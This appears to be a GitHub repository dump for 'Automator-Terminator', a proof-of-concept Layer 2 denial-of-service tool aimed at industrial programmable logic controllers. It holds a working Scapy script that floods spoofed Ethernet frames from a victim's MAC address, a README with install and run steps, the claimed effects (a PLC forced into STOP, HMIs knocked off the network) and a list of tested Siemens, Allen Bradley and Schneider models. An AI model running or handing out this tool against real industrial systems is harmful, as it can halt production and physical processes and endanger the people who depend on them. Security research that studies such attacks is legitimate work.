├── AutomatorTerminator.py ├── README.md └── requirements.txt /AutomatorTerminator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | from scapy.all import * 4 | from colorama import Fore, Back, Style 5 | from subprocess import Popen, PIPE 6 | from art import * 7 | import threading 8 | import subprocess 9 | import time 10 | import os 11 | import sys 12 | import re 13 | 14 | # Banner 15 | 16 | print(Fore.RED + r""" 17 | 18 | ▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄ 19 | ▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █· 20 | ▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ 21 | ▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 22 | ▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ 23 | ▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄ 24 | •██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █· 25 | ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ 26 | ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 27 | ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀ 28 | """) 29 | 30 | time.sleep(1.5) 31 | 32 | # Get IP to exploit 33 | 34 | IP = input("Enter the IP address of the device to exploit: ") 35 | 36 | # Find the mac address of the device 37 | 38 | Mac = getmacbyip(IP) 39 | 40 | # Function to send the ouput to "nothing" 41 | 42 | def NULL (): 43 | 44 | f = open(os.devnull, 'w') 45 | sys.stdout = f 46 | 47 | # Eternal loop to produce DoS condition 48 | 49 | def Arnold (): 50 | 51 | AutomatorTerminator = True 52 | 53 | while AutomatorTerminator == True: 54 | Packet = Ether() 55 | Packet.dst = "00:00:00:00:00:00" 56 | Packet.src = Mac 57 | sendp(Packet) 58 | NULL() 59 | def Sarah (): 60 | 61 | AutomatorTerminator = True 62 | 63 | while AutomatorTerminator == True: 64 | Packet = Ether() 65 | Packet.dst = "00:00:00:00:00:00" 66 | Packet.src = Mac 67 | sendp(Packet) 68 | NULL() 69 | def Kyle (): 70 | AutomatorTerminator = True 71 | 72 | while AutomatorTerminator == True: 73 | Packet = Ether() 74 | Packet.dst = "00:00:00:00:00:00" 75 | Packet.src = Mac 76 | sendp(Packet) 77 | NULL() 78 | 79 | # Arnold 80 | ArnoldThread = threading.Thread(target=Arnold) 81 | ArnoldThread.start() 82 | ArnoldThread.join() 83 | NULL() 84 | 85 | # Sarah 86 | 87 | SarahThread = threading.Thread(target=Sarah) 88 | SarahThread.start() 89 | SarahThread.join() 90 | NULL() 91 | 92 | # Kyle 93 | 94 | KyleThread = threading.Thread(target=Kyle) 95 | KyleThread.start() 96 | KyleThread.join() 97 | NULL() 98 | 99 | 100 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![7c9fazb6djt71](https://user-images.githubusercontent.com/72598486/138572522-bf86f8ed-f867-4454-b0cb-63131ff15e4a.png) 2 | 3 | 4 | # Automator-Terminator 5 | 6 | A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers (PLCs) within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address. 7 | 8 | # Install 9 | 10 | ``` 11 | git clone https://github.com/RoseSecurity/Automator-Terminator.git 12 | 13 | cd /Automator-Terminator 14 | 15 | pip3 install -r requirements.txt 16 | 17 | python3 AutomatorTerminator.py 18 | ``` 19 | # What is a PLC? 20 | 21 | ![6es7314-6ch04-0ab0](https://user-images.githubusercontent.com/72598486/138573508-7e5b4717-c725-4866-9b74-2291b485c9e7.jpg) 22 | 23 | A PROGRAMMABLE LOGIC CONTROLLER (PLC) is an industrial computer control system that continuously monitors the state of input devices and makes decisions based upon a custom program to control the state of output devices. 24 | 25 | Almost any production line, machine function, or process can be greatly enhanced using this type of control system. However, the biggest benefit in using a PLC is the ability to change and replicate the operation or process while collecting and communicating vital information. 26 | 27 | Another advantage of a PLC system is that it is modular. That is, you can mix and match the types of Input and Output devices to best suit your application. 28 | 29 | # How Automator-Terminator Affects PLCs 30 | 31 | Automator-Terminator overwhelms the target device with spoofed traffic, causing a denial of service condition which can result in the PLC not being able to conduct a realtime operation, causing the CPU to go into a "STOP" state, issuing a fault and haulting industrial environment operations, and knocking other devices connected to the PLC (such as the Human Machine Interface) off of the network. 32 | 33 | # How Automator-Terminator Works 34 | 35 | Test 36 | 37 | The tool works by utilizing Scapy to construct ethernet packets from scratch, spoof the sending MAC address to the device you wish to exploit, and issue a wave of packets to a null MAC address with the spoofed source ethernet address of your victim device. 38 | 39 | # Affected Devices 40 | 41 | ## This tool has successfully been tested on: 42 | 43 | ``` 44 | - Siemens S7-300 45 | - Siemens S7-400 46 | - Allen Bradley Micrologix 1500 47 | - Allen Bradley ControlLogix 1756 48 | - Schneider Modicon M340 49 | - Schneider Modicon M580 50 | ``` 51 | 52 | # Available on ExploitDB: 53 | 54 | https://www.exploit-db.com/exploits/50613 55 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | scapy.all 2 | colorama 3 | subprocess 4 | art 5 | threading 6 | time 7 | os 8 | sys 9 | re 10 | --------------------------------------------------------------------------------